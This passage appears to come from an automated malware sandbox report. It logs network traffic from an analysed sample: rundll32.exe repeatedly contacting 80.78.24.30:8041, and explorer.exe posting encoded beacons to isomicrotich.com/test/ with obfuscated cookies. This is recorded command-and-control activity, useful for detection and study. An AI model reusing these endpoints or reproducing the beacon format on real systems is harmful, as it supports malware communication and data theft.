                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          16192.168.2.94975480.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.793349981 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          17192.168.2.94975580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:09.430943012 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          18192.168.2.94975780.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.158838987 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          19192.168.2.94975880.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.787509918 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          20192.168.2.94976080.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:20.444628000 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          21192.168.2.94976180.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:21.075803041 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          22192.168.2.94976680.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.673386097 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          23192.168.2.94976780.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:32.333218098 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          24192.168.2.94977080.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.854662895 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          25192.168.2.94977180.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:41.495584011 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          26192.168.2.94977580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:45.223495007 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          27192.168.2.94977680.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:45.869189978 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          28192.168.2.94978380.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.557792902 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          29192.168.2.94978580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.300137043 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          30192.168.2.94979180.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.037760019 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          31192.168.2.94979280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.992655993 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          32192.168.2.94979680.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.703573942 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          33192.168.2.94979780.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:47:01.349472046 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          0192.168.2.949773188.114.96.34433504C:\Windows\explorer.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-03 18:46:42 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFh9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 92
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-03 18:46:42 UTC92OUTData Raw: 31 51 44 56 39 33 6c 49 59 36 59 33 35 2f 69 57 77 44 6f 53 6c 71 43 36 6b 4b 44 63 33 7a 4e 79 5a 51 78 76 35 61 52 59 74 4d 4e 45 34 73 65 48 50 58 31 65 71 44 62 71 4b 78 70 6f 48 76 7a 37 56 5a 4b 6d 4e 44 79 65 41 6a 70 44 4c 30 49 47 51 4a 7a 4e 57 52 56 48 7a 56 45 3d
                                                                                                                                                                                                                          Data Ascii: 1QDV93lIY6Y35/iWwDoSlqC6kKDc3zNyZQxv5aRYtMNE4seHPX1eqDbqKxpoHvz7VZKmNDyeAjpDL0IGQJzNWRVHzVE=
                                                                                                                                                                                                                          2024-10-03 18:46:43 UTC544INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:43 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KaJaOdhTKmwuEvzftJXbpJFtZQkHTpScnF7LTjl3nOjxJEdwN5A2UcNASJw4mbwwLVhOEZKrnpK0S2gQ50Rj%2Bd6A6ugqy6va3rdX%2FX7T%2BAfwUPlQ4Cia1iFGVBavs96YFKH%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf18b4d8e6c32c-EWR
                                                                                                                                                                                                                          2024-10-03 18:46:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          1192.168.2.949774188.114.96.34433504C:\Windows\explorer.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-03 18:46:44 UTC413OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFg9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-03 18:46:45 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:45 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jW8A3z7ODSAkfrlJSwYmHCk0R1l2%2Br4CE7BOGfa2Nrl54orMMgozGktA74ZDeNwTyR7Z5LqiSEchieQbCeTsPXMMLyOy1MgaJm2WyqZe4hk1f4fIrtPd7XzZd%2Bh9CE32zN9v"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf18c33ea678e2-EWR
                                                                                                                                                                                                                          2024-10-03 18:46:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          2192.168.2.949777188.114.96.34433504C:\Windows\explorer.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-03 18:46:46 UTC413OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFj9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-03 18:46:46 UTC546INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:46 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=phqn2rJenCKZ4CuDhwtRvWUvI%2FAWWDOgVogpFRgbe3IvhIVLZnGOIJGt%2Fl4yi1d6r7SqVFOj99QcdNhD%2Fdjma9QYYuO6Ti9c4yopN%2FArRV%2BWO7MqF6tLpEe5aVDhkujiZxkW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf18ca7876437b-EWR
                                                                                                                                                                                                                          2024-10-03 18:46:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          3192.168.2.949779188.114.96.34433504C:\Windows\explorer.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-03 18:46:47 UTC413OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFi9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-03 18:46:47 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:47 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qF0szR14smg5Uqz5%2F8H6kAGS1uoZzk%2BLkl7xD5fqYhP7zty%2BZwHLBnRFgwHs2Nlf9yOUcNr1y%2F%2BaqOo2ebpr3U9CBOElVKqkuxg2ETEErdI6QQMj9HAG62EuzlQP7NtsXXXW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf18d0fa4843cd-EWR
                                                                                                                                                                                                                          2024-10-03 18:46:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          4192.168.2.949780188.114.96.34433504C:\Windows\explorer.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-03 18:46:48 UTC413OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFl9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-03 18:46:48 UTC554INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:48 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t6iW93HsA9T6mdsYR%2F6M7zyZVqQJjZOm%2BXHR%2BKsbU8n2V58GrtddeheRp4IyQtJe1%2Fg1T%2F8yBHH5a8UMpKg%2BS6pFDvl%2F2rC7%2FJf7VaWGsEUgDn2ZKXBKkxHQy9VfBAedlG%2F5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf18d79ebd8c15-EWR
                                                                                                                                                                                                                          2024-10-03 18:46:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          5192.168.2.949781188.114.96.34433504C:\Windows\explorer.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-03 18:46:49 UTC413OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFk9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-03 18:46:49 UTC573INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:49 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dn%2BcPhXc9yJkhVblHSVdQYFuK2W%2BZAsjWrix8PwC%2FoKWy4NbTNyIwWhEY9lKKKgdgRHv51%2B4N8qE%2B4%2FoEbn1H3oUMlNCLegraE0jYagXWaunsVQ3QVsxjExrIKmFp1LFtuS%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf18df5e4142d5-EWR
                                                                                                                                                                                                                          2024-10-03 18:46:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          6192.168.2.949782188.114.96.34433504C:\Windows\explorer.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-03 18:46:50 UTC413OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFn9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-03 18:46:51 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:51 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FJFEky7IrDEfaWYtkcHpPGkRJfjidtBX2pP0JuVVshcp7VsNIkAaaTt03KxM4AJSziCyrs%2F5AohUMqhJaNH4Q66P9kvzbs30c72EpEFAJaoKzLm9%2FvwbcR4KO2o2kH9RBGQo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf18e7afa942ad-EWR
                                                                                                                                                                                                                          2024-10-03 18:46:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          7192.168.2.949784188.114.96.34433504C:\Windows\explorer.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-03 18:46:52 UTC413OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFm9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-03 18:46:53 UTC593INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:53 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
